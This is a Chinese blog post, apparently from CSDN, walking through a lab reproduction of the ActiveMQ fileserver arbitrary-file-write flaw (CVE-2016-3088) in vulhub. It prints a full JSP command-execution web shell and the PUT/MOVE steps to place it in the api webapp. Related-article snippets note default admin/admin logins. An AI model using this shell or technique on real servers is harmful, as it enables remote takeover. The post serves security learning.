CVE-2016-3088 ActiveMQ漏洞复现

最新推荐文章于 2024-09-14 11:38:41 发布
最新推荐文章于 2024-09-14 11:38:41 发布
阅读量696 收藏
点赞数
文章标签: activemq web安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Makboli/article/details/125539767
版权

CVE-2016-3088漏洞复现

考试结束了,有时间回归安全了,抓紧补补拉跨的技术,顺便分享一下学习过程,大佬勿喷

一.漏洞背景

ActiveMQ web控制台分为三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是存储文件的接口;admin和api需要登录才能使用,fileserver不需要登录。
fileserver 是一个 RESTful API 接口。我们可以通过 GET、PUT 和 DELETE 等 HTTP 请求读取和写入其中存储的文件。

二.漏洞详情

这个漏洞出现在fileserver应用中,原理就是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。

三.实战过程

首先启用vulhub,进入CVE-2016-3088目录下
使用docker-compose up -d
成功后开始实战
安装教程参考:kali linux下vulhub的安装教程与使用

1.通过访问127.0.0.1:8161/admin/test/systemPro[erties.jsp查看Activemq的绝对路径。

在这里插入图片描述

2.进入127.0.0.1:8161/fileserver下进行抓包

在这里插入图片描述

3.然后将GET修改为PUT,并在目录后加入想上传的数据包。回显为204表示上传成功。

在这里插入图片描述
本人小白,此处代码来自大佬的实战演示

<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
4.因为fileserver不解析,所以还需要使用MOVE请求来移动上传文件,移动的路径为/opt/activemq/webapps/api/,回显204成功

在这里插入图片描述

5. 进入/api目录下发现文件移动成功

在这里插入图片描述

6.执行发现成功回显为root权限

在这里插入图片描述

芝士TOM
关注
漏洞复现ActiveMQ文件上传漏洞(CVE-2016-3088)
晚风不及你
01-05 653
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
activemq 远程代码执行 (CVE-2016-3088
qq_32445755的博客
03-31 575
简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了 jetty。Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代 Web 应用,在受影响系统上执行远程代码,请拿到 flag,默认在/tmp/目录中。提示:该漏洞一句话木马无法执行,请利用命令执行
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3132
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
activemq系列漏洞复现
m0_49420271的博客
06-07 2943
vulhub中activemq系列漏洞复现
CVE-2016-3088ActiveMQ任意文件写入漏洞
最新发布
m0_74168970的博客
09-14 532
根目录在/opt/activemq下面,所以我们访问的目录是/opt/activemq/webapps/,上传的最终目录就是/opt/activemq/webapps/admin(aqi)因此这里我自己新建了一个字典进行爆破目标字段,我用的是yakit,我的bur总出问题,麻烦,爆破过程不在赘述,事实证明是可以爆破出来的,这里可以参考这位大佬的博客。上传成功,接下来将该目录移动到api目录下,也可以到admin只要能解析就行,现在就要用到/opt/activemq/webapps/admin/路径了。
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088复现
m0_69994768的博客
01-23 1205
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088
ActiveMQ任意文件写入漏洞CVE-2016-3088漏洞复现
玄道的网安博客
11-30 389
简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQWeb 应用。 环境搭建 这里使用vulhub来安装 进入目录 cd vulhub/activemq/CVE-2016-3088 启动环境 docker-c...
漏洞复现-Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)
玄道的网安博客
08-11 974
Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。类, 然后重写对应的逻辑,这样在运⾏的候, 因为。查找顺序的问题, 程序就会优先使⽤当前源码⽬录⾥的。然后随便打⼏个断点试试 (注意在⼀次通信的过程中。获取到了对应的序列化器之后, 会调⽤它的。⽅法, 后者可以调⽤任意类的带有⼀个。⼀些其它的数据, 调试的候记得判断)⽅法的利⽤, 这块其实跟。
ActiveMQ CVE-2016-3088
菜鸟的学习笔记
06-28 232
1. 环境搭建 使用vulhub的配置执行命令:docker-compose up -d 一键启动漏洞环境 环境监听61616端口和8161端口,其中8161是web控制台端口。此漏洞出现在 Web 控制台中。 访问http://your-ip:8161/查看网页,说明环境已经运行成功。默认的 ActiveMQ 帐户和密码是admin。 2. 漏洞复现 首先我们先访问http://your-ip:8161/admin/test/systemProperties.jsp,来查看绝对路径。 之后需要使用B
vulhub学习(2) Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
yukinorong的博客
06-24 3227
漏洞环境 配置vulhub , 在目录activemq/CVE-2016-3088中打开docker。 docker中显示 此开启了两个端口分别为8161和61616 其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞原理 ActiveMQ Web控制台分为三个应用程序:admin,api和f
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2016-3088)
又菜又爱倒腾的博客
10-29 1811
#Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)# 一、漏洞简介 ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQWeb 应用。 2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 A
ActiveMQ任意文件写入漏洞CVE-2016-3088复现
菲曼巴的博客
11-23 744
一、漏洞描述 该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。 二、影响版本 Apache ActiveMQ 5.0.0 - 5.13.2 三、环境搭建 1、下载、搭建vulhub 2、下载、安装docker服务,使用docker-co
ActiveMQ未授权访问漏洞
starhei.zxy的博客
08-05 189
ActiveMQ是一款流行的开源消息服务器。默认情况下,ActiveMQ服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是。步骤一:使用以下Fofa语法搜索产品...,在打开的页面输入....
【vulhub漏洞复现CVE-2016-3088 ActiveMQ任意文件写入漏洞
RexHa的博客
02-27 2747
漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。访问8161端口默认账户密码admin/admin 登录文件上传成功需要有以下几点前提:知道文件上传的绝对路径网站有文件上传功能文件类型没有被限制上传的文
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1516
ActiveMQ 反序列化漏洞
ActiveMQ 反序列化漏洞CVE-2015-5254)复现
糖小喵
04-12 346
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用...
Apache activeMQ漏洞复现
Shanfenglan's blog
12-14 3239
文章目录1. ActiveMQ 反序列化漏洞CVE-2015-5254)2. ActiveMQ任意文件写入漏洞CVE-2016-3088)2.1 利用参考文章 1. ActiveMQ 反序列化漏洞CVE-2015-5254) Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 工具下载地址:http
CVE-2016-3088复现
07-28
- *1* *3* [CVE-2016-3088 ActiveMQ漏洞复现](https://blog.csdn.net/zwj101010101010/article/details/126018390)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值